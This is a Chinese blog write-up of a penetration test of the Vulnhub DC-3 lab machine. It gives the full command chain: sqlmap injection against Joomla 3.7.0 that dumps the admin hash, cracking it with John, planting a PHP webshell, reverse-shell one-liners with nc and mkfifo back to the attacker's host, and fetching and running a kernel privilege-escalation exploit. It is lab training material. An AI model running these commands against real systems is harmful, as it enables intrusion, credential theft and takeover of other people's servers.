【CyberSecurityLearning 72】DC系列之DC-3渗透测试(Joomla)

最新推荐文章于 2024-06-06 09:32:47 发布
最新推荐文章于 2024-06-06 09:32:47 发布
阅读量928 收藏 3
点赞数 3
分类专栏: CyberSecurityLearning 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waffle666/article/details/116096346
版权

目录

DC-3靶机渗透测试

一、实验环境

二、渗透过程演示

1、信息搜集

2、SQL注入

3、登录后台

4、反弹shell

5、提权

总结:

 

DC-3靶机渗透测试

DC-3也是一个黑盒测试,我们所能知道的只有它的MAC地址,我们可以根据它的MAC地址来确定IP地址

一、实验环境

    实验环境:
    kali2021:192.168.3.155/24(桥接到vmnet0)
    靶机环境DC-3(桥接到vmnet0,MAC地址:00:0C:29:2C:47:A4)
    保证kali和DC-3在同一个网段

二、渗透过程演示

1、信息搜集

①搜集IP和端口

利用nmap或者是netdiscover

使用命令:netdiscover或者 netdiscover -r 192.168.3.0/24或者nmap -sP 192.168.3.1/24 -o nmap.sP,得知DC-3的IP地址为192.168.3.159

接下来对DC-3做端口扫描

nmap -A 192.168.3.159 -p 1-65535 -oN nmap.A    发现仅开放了80端口

访问192.168.3.159这个网页,如下图所示

我们发现好像不太能够确定网站究竟使用的是什么,我们对网站做指纹识别,做指纹识别的时候我们用whatweb命令

whatweb -h查看命令用法

网站指纹识别工具Whatweb的使用

命令:whatweb http://192.168.3.159,发现是Joomla,开源的内容管理系统

国外三大开源的PHP CMS :
1、drupal
2、wordpress site
3、joomla

发现是joomla,这个就可以使用网站针对这个cms的扫描器Joomscan,kali默认是没有安装的,需要自己手动安装

joomscan专门扫描joomla

②joomscan安装和使用

Joomscan安装

git clone https://github.com/rezasp/joomscan.git

或者apt install joonscan(√)

使用方法

joomscan --url http://192.168.3.159

上面那些目录都是可以看的

得到joomla对应版本以及后台地址http://192.168.3.159/administrator/,看看能不能得到网站后台的账密,做爆破(这是绝招,不到万不得已不建议用)

 

2、SQL注入

③搜索关于joomla3.7.0有没有漏洞(exploitdb查找对应exp

在kali自带的exploitdb中查找对应版本的joomla漏洞

searchsploit joomla 3.7.0    发现了有SQL注入漏洞

接下来把这个文件复制到当前路径下:cp /usr/share/exploitdb/exploits/php/webapps/42033.txt   joomlav370_sqli.txt

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


执行前把地址改一下:localhost改为192.168.3.159

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

--dbs是列出当前服务器中的mysql数据库中都有哪些库名:

爆库名:--dbs

列出当前数据库的名字:--current-db

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

爆表:-D "joomladb" --tables

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

查询列、字段:-D "joomladb" -T "#__users" --columns

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
给个路径写1,线程写10

列目录(name,password):-C指定字段  -C "name,password" --dump

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

 name   | password                                                    
+---------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |

 

使用John解密

著名密码破解利器John the Ripper

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

将上述密文写到一个文件里面:vim joomla_v370_admin_hash.txt

john joomla_v370_admin_hash.txt    解出密码:snoopy

3、登录后台

admin | snoopy 成功登陆后台

登录进后台,发现可以修改网页源代码

这个地方如果可以修改PHP文件的话,那就可以直接写一个PHP大马/小马,要找到路径,根据joomla网站特点,一般在/templates下

 

在template栏中发现可以写文件和上传文件。我们可以写一个小马上传上去

点击NewFile创建文件(yjh.php)

接下来打开蚁剑

右键查看虚拟终端:whoami

4、反弹shell

kali 本地监听

    nc -lvvp 2333

蚁剑虚拟终端

    nc -e /bin/bash 192.168.3.155 2333

    -e 参数不可用

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.155 2333 >/tmp/f

反弹成功!!!

5、提权

①信息收集

cat /proc/version查看版本
cat /etc/issue查看发行版信息

发现该靶机版本为Ubuntu 16.04

②在exploitdb中查找对应版本的joomla漏洞

输入如下命令查看该版本漏洞

searchsploit Ubuntu 16.04

使用39772.txt进行提权

cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt

cat ubuntu1604_shell.txt

先把exp下载到kali镜像中

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

在反弹shell 的界面测试,发现访问失败,原因是我们的电脑无法访问国外的服务器

解决方法:我们先将39772.zip 文件下载至本地,本地搭建服务器,将文件上传至服务器,

我们直接访问本地服务器下载文件即可

直接在靶机中下载容易失败。我们先下载到本地,在kali中搭建服务,并将exp压缩包上传上去

EXP资源

链接:https://pan.baidu.com/s/1AeuJrP-T6elka5aZP9KL9g
提取码:0fkw

将下载的压缩包放到/var/www/html/文件夹下

 

接下来只需要在shell中输入如下命令即可将exp下载到靶机(DC-3)中

wget http://192.168.3.155/39772.zip(192.168.3.155是kali的IP,把kali上的文件下载到DC3)

之后解压该文件

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

改个密码:

总结:

1、Joomscan可针对JoomlaCMS进行扫描

2、使用kali自带exploitdb库可查询kali收集的各种exp,命令为Searchsploit 程序名称 版本

3、使用John对hash值解密

4、bash反弹shell

 

 

 

Wαff1ε
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2491
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
DC系列漏洞靶场-渗透测试学习复现(DC-3)
W983079520的博客
12-02 1325
DC-3是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了linux内核漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-3靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口只有一个: 80(http默认端口)。 4 访问web 访问we
kali中安装gobuster、joomscan、Linux下的文本编辑器教程
最新发布
qq_61861243的博客
06-06 472
1、先更新apt,再安装gobuster2、安装成功。
DC-3渗透实战(详细过程)
tzyyyyyy的博客
10-16 2695
DC-3靶机渗透实战 利用各种姿势方法获取最终flag
DC-3完整的渗透测试过程
weixin_51097397的博客
07-26 1284
1.此次DC-3的渗透用到了如下几种工具的基础使用①arp-scan②namp③dirsearch⑤sqlmap⑥john⑦nc2.学到了如何用文件上传反弹shell?> #反弹shell脚本nc -lvvp 6666 #kali里nc开启监听3.学会用searchsploit搜索系统漏洞进行提权cat /proc/version #查看系统版本信息 cat /etc/issue。
DC-3靶机渗透
weixin_45442394的博客
06-14 736
1 获取ip 开机前一直按shift或Esc键 ro recovery nomodeset改为quiet splash rw init=/bin/bash 更改后按F10 重启虚拟机 2 端口扫描 3 服务确认 4 网站目录扫描 5 查看页面 joomscan扫描 joomscan --url http://192.168.182.139 -ec 查看版本漏洞 查看文档 6 SQL注入 数据库名 sqlmap -u “http://192.168.182.139/index.php?o
DC靶机渗透系列DC1-DC3)
居上
07-01 743
收获 DC1 回顾了metasploit的一些用法 利用已知cms的exp来getshell hashcat爆破用法 find提权 DC2 cewl根据网页内容生成字典 wpscan结合cewl跑账号和密码 用metasploit的模块来ssh爆破 rbash->bash--------vim逃逸 git提权 DC3 searchsploit的一些用法 在github上搜罗cms探测脚本 john爆破用法 页面模板里添加一句话木马 使用Python开启SimpleHTTPServer 公开的
DC3靶机渗透测试练习
10-05
因此,在 DC3靶机渗透测试练习中,我们需要扫描 Joomla 框架的漏洞,以便于发现潜在的漏洞和弱点。 在 Joomla 框架漏洞扫描阶段,我们使用了 joomscan 工具来扫描 Joomla 版本,发现潜在的漏洞和弱点。joomscan 是...
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2946
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
8.100个渗透测试实战#8(DC-3)
qwsn
03-28 2644
世间一切皆可努力 ...
DC-3 渗透测试
Darklord.W
04-13 1827
DC-3渗透测试 0x00实验环境 靶机DC-3,IP地址:192.168.8.134 测试机:Kali,IP地址:192.168.8.128; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口以及服务扫描(masscan以及nmap) 访问web 扫描web目录 得到: 如上图所示该网站由cms搭建,搜...
DC系列靶机渗透之DC-3
weixin_52515588的博客
06-08 429
利用arp -scan -l扫描主机然后利用nmap查看开放的端口,如上图所示,80端口开放,那么接下来我们可以利用这个信息进行渗透访问一下80端口得到如上图所示的信息。然后使用whatweb对网站进行扫描,得到如下信息,可以知道网站是利用joomla部署的,那么我们就可以利用joomscan扫描 利用扫描工具扫出了网站后台,我们利用浏览器登录 如上图所示。我们在上述扫描结果中,能够看出来使用的joomla版本,接下来我们就可以利用msf查找漏洞 我们发现存在sql注入漏洞根据提示的路径,我们查看文件内容如
【渗透项目】靶机DC-3渗透过程
命运的旋律的博客
04-03 724
信息收集 主机发现 netdiscover -i eht0 -r 192.168.72.0/24 端口扫描 nmap -sS -sV -T4 -O -p- 192.168.72.155 目录扫描 gobuster dir -u http://192.168.72.155 -w /usr/share/dirb/wordlists/big.txt /.htpasswd (Statu...
DC-3靶机渗透测试
weixin_48991458的博客
11-23 4167
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这里有个坑,VMware用户要官网下的第二个镜像才能发现IP地址,这里官方也有说明,可以仔细看一下,这里也贴出来了 两台主机设为NAT模式,靶机需要改一下设置,默认是桥接 开始操作 先信息收集,两台主机在一个局域网下用netdiscover扫起来,在结合mac地址很快就能发现靶机IP 靶机mac地址在虚拟机设置
joomla渗透测试(脏牛提权)
a3320315的博客
05-15 1057
本来是个域渗透,不过环境有问题,就当作web题在做了 解题过程 这是一个joomla cms 我们先扫一下目录 连接mysql 得到MySQL的账号和密码 然后创建新的管理员 INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 2107
DC-3靶机渗透测试详细教程
DC-3靶机 渗透测试
她叫常玉莹
07-18 3029
DC-3查看靶机mac地址获取IP地址NmapJooScansqlmapjohn上传Webshellnc反弹提权 DC-3只有一个目标获得root权限,拿到flag。 查看靶机mac地址 00:0C:29:0D:D3:78 获取IP地址 使用arp-scan扫描 得知靶机IP地址 192.168.0.104 Nmap 使用nmap扫描收集靶机信息 nmap -sV -p- 192.168.0.104 看到靶机开放了80端口,访问一下 http://192.168.0.104:80 在wappaly
dc-3 靶机渗透学习
..
03-17 3568
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误。 vim /etc/network/interfacers 改成 vim /etc/network/interfaces Vulnhub靶机检测不到IP地址_阿帅start的博客-CSDN博客_靶机没有ip 信息收集 使用nmap对当前网段进行扫描 nmap -sP 192.168.202.0/24 在排除kali攻击机和物理机ip后,对192.168.2...
Joomla!3扩展开发实战指南 - 第三版
3扩展开发 - 第三版_中文版10-1.pdf" 是一本针对Joomla! 3 CMS的扩展开发指南,由蒂姆·普拉默撰写。书中提供了创建插件、模块和组件的实践经验,适合Joomla! 3的初学者和进阶开发者。 在Joomla! 3中,扩展是增强和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值